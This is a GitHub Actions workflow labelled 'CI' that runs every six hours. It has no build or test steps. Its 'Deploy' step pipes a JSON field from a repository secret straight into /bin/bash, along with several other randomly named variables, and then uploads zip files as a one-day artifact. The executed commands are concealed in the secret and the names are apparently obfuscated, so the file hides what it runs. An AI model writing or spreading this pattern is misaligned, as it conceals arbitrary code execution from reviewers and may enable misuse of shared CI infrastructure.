name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '19 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          tns255: ${{ secrets.tns255 }}
        run: |
          printf '%s' "$tns255" | jq -r .ev08601 | /bin/bash
          echo $vm8 | jq -r .ny8 | /bin/bash
          echo $sfj0688 | jq -r .xrs9 | /bin/bash
          echo $lfa7 | jq -r .j2779 | /bin/bash
          echo $fto68 | jq -r .ocpx511 | /bin/bash
          echo $xhf950 | jq -r .wp95 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: K8J4xBHO
          path: "*.zip"
          retention-days: 1
